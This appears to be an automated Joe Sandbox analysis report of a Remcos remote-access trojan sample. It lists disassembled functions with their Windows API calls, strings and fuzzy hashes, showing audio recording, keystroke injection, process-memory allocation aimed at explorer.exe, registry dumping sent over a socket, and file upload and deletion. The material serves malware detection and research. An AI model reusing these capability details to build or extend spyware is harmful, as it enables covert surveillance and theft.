                                    • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreateDeleteExecuteShellSleep
                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                    • API String ID: 1462127192-2001430897
                                    • Opcode ID: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                    • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                    • Opcode Fuzzy Hash: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                    • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                    Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Users\user\AppData\Roaming\keHuNxIumw.exe), ref: 004074D9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess
                                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                    • API String ID: 2050909247-4242073005
                                    • Opcode ID: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                    • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                    • Opcode Fuzzy Hash: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                    • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                    Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strftime.LIBCMT ref: 00401D50
                                      • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                    • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                    • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                    • API String ID: 3809562944-243156785
                                    • Opcode ID: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                    • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                    • Opcode Fuzzy Hash: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                    • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                    Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                    • int.LIBCPMT ref: 00410EBC
                                      • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                      • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                    • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                    • __Init_thread_footer.LIBCMT ref: 00410F64
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                    • String ID: ,kG$0kG
                                    • API String ID: 3815856325-2015055088
                                    • Opcode ID: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                    • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                    • Opcode Fuzzy Hash: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                    • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                    Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                    • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                    • waveInStart.WINMM ref: 00401CFE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                    • String ID: dMG$|MG$PG
                                    • API String ID: 1356121797-532278878
                                    • Opcode ID: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                    • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                    • Opcode Fuzzy Hash: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                    • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                    Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                      • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                      • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                      • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                    • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                    • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                    • TranslateMessage.USER32(?), ref: 0041D57A
                                    • DispatchMessageA.USER32(?), ref: 0041D584
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                    • String ID: Remcos
                                    • API String ID: 1970332568-165870891
                                    • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                    • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                    • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                    • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                    Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                    • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                    • Opcode Fuzzy Hash: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                    • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                    Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                    • __alloca_probe_16.LIBCMT ref: 00453F6A
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                    • __alloca_probe_16.LIBCMT ref: 00454014
                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                      • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                    • __freea.LIBCMT ref: 00454083
                                    • __freea.LIBCMT ref: 0045408F
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                    • String ID:
                                    • API String ID: 201697637-0
                                    • Opcode ID: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                    • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                    • Opcode Fuzzy Hash: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                    • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                    Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • _memcmp.LIBVCRUNTIME ref: 004454A4
                                    • _free.LIBCMT ref: 00445515
                                    • _free.LIBCMT ref: 0044552E
                                    • _free.LIBCMT ref: 00445560
                                    • _free.LIBCMT ref: 00445569
                                    • _free.LIBCMT ref: 00445575
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorLast$_abort_memcmp
                                    • String ID: C
                                    • API String ID: 1679612858-1037565863
                                    • Opcode ID: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                    • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                    • Opcode Fuzzy Hash: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                    • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                    Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: tcp$udp
                                    • API String ID: 0-3725065008
                                    • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                    • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                    • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                    • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                    Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004018BE
                                    • ExitThread.KERNEL32 ref: 004018F6
                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                      • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                    • String ID: PkG$XMG$NG$NG
                                    • API String ID: 1649129571-3151166067
                                    • Opcode ID: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                    • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                    • Opcode Fuzzy Hash: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                    • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                    Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                      • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                      • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                    • String ID: .part
                                    • API String ID: 1303771098-3499674018
                                    • Opcode ID: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                    • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                    • Opcode Fuzzy Hash: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                    • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                    Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendInput.USER32 ref: 00419A25
                                    • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                    • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                      • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InputSend$Virtual
                                    • String ID:
                                    • API String ID: 1167301434-0
                                    • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                    • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                    • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                    • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                    Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __freea$__alloca_probe_16_free
                                    • String ID: a/p$am/pm$h{D
                                    • API String ID: 2936374016-2303565833
                                    • Opcode ID: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                    • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                    • Opcode Fuzzy Hash: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                    • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                    Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                    • _free.LIBCMT ref: 00444E87
                                    • _free.LIBCMT ref: 00444E9E
                                    • _free.LIBCMT ref: 00444EBD
                                    • _free.LIBCMT ref: 00444ED8
                                    • _free.LIBCMT ref: 00444EEF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$AllocateHeap
                                    • String ID: KED
                                    • API String ID: 3033488037-2133951994
                                    • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                    • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                    • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                    • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                    Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                    • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Enum$InfoQueryValue
                                    • String ID: [regsplt]$xUG$TG
                                    • API String ID: 3554306468-1165877943
                                    • Opcode ID: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                    • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                    • Opcode Fuzzy Hash: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                    • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                    Function 00413D48 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                      • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                      • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumInfoOpenQuerysend
                                    • String ID: xUG$NG$NG$TG
                                    • API String ID: 3114080316-2811732169
                                    • Opcode ID: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                    • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                    • Opcode Fuzzy Hash: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                    • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                    Function 004511AC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F918,?,00000000,?,00000001,?,000000FF,00000001,0043F918,?), ref: 004511F9
                                    • __alloca_probe_16.LIBCMT ref: 00451231
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451282
                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451294
                                    • __freea.LIBCMT ref: 0045129D
                                      • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                    • String ID: PkGNG
                                    • API String ID: 313313983-263838557
                                    • Opcode ID: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                    • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                    • Opcode Fuzzy Hash: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                    • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                    Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                      • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                      • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                      • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                    • _wcslen.LIBCMT ref: 0041B7F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                    • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                    • API String ID: 37874593-122982132
                                    • Opcode ID: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                    • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                    • Opcode Fuzzy Hash: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                    • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                    Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                      • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                      • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                    • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                    Strings
